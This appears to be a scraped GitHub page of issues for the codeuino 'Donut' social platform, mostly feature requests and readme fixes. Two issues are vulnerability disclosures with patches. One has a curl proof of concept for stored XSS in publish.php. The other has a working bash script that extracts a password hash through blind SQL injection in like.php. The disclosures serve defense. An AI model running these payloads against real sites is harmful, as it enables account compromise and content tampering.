codeuino / social-platform-donut-frontend Goto Github PK
View Code? Open in Web Editor NEWThis is an Open Source social Platform where people can interact with Open Source expertise around the globe and work on different projects
This is an Open Source social Platform where people can interact with Open Source expertise around the globe and work on different projects
To make the front-end of a feed-page to show articles, projects, events, blog, communities etc.
create an authentication for login with Facebook. It's already done with google and GitHub(refer that). Follow the folder structure and pull code from development branch and send the PR to same branch.
Need a great UX for the landing page after the user logs in
Hello Everyone, My name is Yashwanth, from IIT Bhubaneswar,India. I have good knowledge in HTML,CSS, Java Script,Python,Java. I am specialized in Machine Learning,Deep Learning and Data Analytics. I am planning to apply GSOC 2019 with Codeuino. I need help to get started with. Assign me some task/sub goal to get started to work and contribute codeuino. Thankyou!
There are few typos in Readme which need to be removed, especially in the "What is Donut?" part.
Code base is not tested.
use mocha to test codebase
Come up with a solution to show popular project
Must be the ratio of number of likes/number of dislikes:- max of this will most popular one
For example: https://frappe.io/charts
New UI of landing page
A lot of the code in the repository is not formatted and the routes are not properly commented which becomes difficult for a new user to navigate.
I would like to a format and comment the code part by part.
For this, you can take inspiration from Github tags, also you free to show your creativity in this.
You can also produce 2-3 variations if you want.
A front-end of discussion portal for the members to discuss on various topics to be integrated with the front-end of the feed-page.
Feature Suggestion
Dependabot is a special bot on github which can update dependencies by adding pr in the project and configuring it can create a better experience for other developers to add pr and issues in the organization.
Though implement this bot on Donut project, though I really like idea behind it @jaskirat2000 :) .
https://dependabot.com/ for more information.
After the updation of the front-end landing page, We need to connect the front-end buttons and all the links with the respective back-end rest point present.
The route to publish a project is made but no html page is made.
Suggestions for design are appreciated.
Fix the Social login button present on the dashboard, backend api is already linked. You have to fix the styles and make sure user is able to click them.
To update the README with the new UI.
Current logic in O(n)^2 make it O(1) by using maps instead of arrays
I am getting the follwoing error when I run npm install --save:
Please include the following file with any support request:
npm ERR! /home/username/Social-Platform-Donut/npm-debug.log
modifying readme a bit.
There are a lot fo npm install
commands. All this can be done by simplying typing npm install
inside the directory of the project. So a simple change in readme can make it cleaner. :D
This issue can be taken up by anyone.
Cheers!
Hi Developers,
you do not sanitize the 5 $_POST variables username,contentname,tagline,content, and genre against XSS vectors in publish.php when inserting new articles in the database. This can lead to different harmfull actions performed against users by injected code. You should consider applying filter functions similar to the attached patch.
patch.txt
Note that this patch does filter all HTML tags..what might not be an option for you as you use an editor that produces HTML tags. However there are solutions for these cases too, e.g.: HTML Purifier(http://htmlpurifier.org/)
POC:
This will insert a malicious XSS code inside each of the mentioned fields with the username of user shown as author and does not even require authentication.
$ curl -d "username=user'#\"><script>alert('usr');</script><a href=\"#&contentname=<script>alert('title');</script>&tagline=<script>alert('tags');</script>&content=<script>alert('content');</script>&<script>alert('gen');</script>" -X POST http://localhost/Social-Platform-Donut/596841401/publish.php
Further, you should consider authenticating the user and the calling script before processing POST requests in general and reading static contents from storage when accessible instead of passing and reading them from easily alterable request parameters.
Hi Developers,
you do not sanitize the two $_POST variables article and username when performing Like and Dislike actions in like.php and dislikes.php. This can be misused to modify your used SQL queries. You can prevent the risk by filtering the two variables before using them as in the following patch:
patch.txt
POC:
The vulnerabilities can i.a. be used to read content from the database in a Blind SQL Injection manner. The following code extracts the password hash of the user "user" by bruteforcing each character using a SQL Injection in like.php:
( We assume an article with id=0 exists and was not yet liked by a user "user", note that we could simply create an article as unauthenticated user for this purpose: see #5 )
#!/bin/bash
URL="http://localhost/Social-Platform-Donut/596841401/like.php"
USERNAME="user" # any name
ARTICLE=0 # the article id
ASCII_DEC=($(seq 0 0; seq 32 126)) # list of ascii char codes
FIELD="password" # the field we are extracting the content of
TABLE="users" # the table we are extracting the content of
WHERE="username='user'" # where clause for extracting
VALUE=""
# initial like entry
PREV=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}" -X POST "${URL}")
i=1 # substring index
j=0 # char code index
while true; do
c=${ASCII_DEC[$j]}
# query that will eval to true or false -> control like add or remove
QUERY="' AND '${c}'=ASCII(SUBSTRING((SELECT ${FIELD} FROM ${TABLE} WHERE ${WHERE}),${i},1)) AND '1'='1"
RES=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}${QUERY}" -X POST "${URL}")
if [ $RES -lt $PREV ]; then
if [ $c -eq 0 ]; then
echo "found ${VALUE} for SELECT ${FIELD} FROM ${TABLE} WHERE ${WHERE}"
exit
fi
VALUE=$(printf "${VALUE}\x$(printf %x ${c})") # store found chars
i=$((${i}+1)) # extract next char
# reset
j=0
curl -s -d "article=${ARTICLE}&username=${USERNAME}' AND '1'='1" -X POST "${URL}" 1>/dev/null
RES=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}' AND '1'='0" -X POST "${URL}")
else
j=$((${j}+1)) # try next char code
fi
PREV="${RES}"
done
Further, you should consider authenticating the user and the calling script before processing POST requests in general and reading static contents from storage when accessible instead of passing and reading them from easily alterable request parameters.
Making new wireframes for the feedback page
Make a fronted Community ( Organisation ) dashboard for this Platform.
Just like we have dashboard in LinkedIn, Twitter, Facebook etc for the organisation to make an do changes.
So this has to be made in this way:
Reference to these examples:
https://goo.gl/images/6i4dC6
https://goo.gl/images/kLk3rM
https://goo.gl/images/qrtmm1
It should include what all things are required in the dashboard for a community
The front end and backend of platform is not integrated.
It is important to integrate for version 1.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.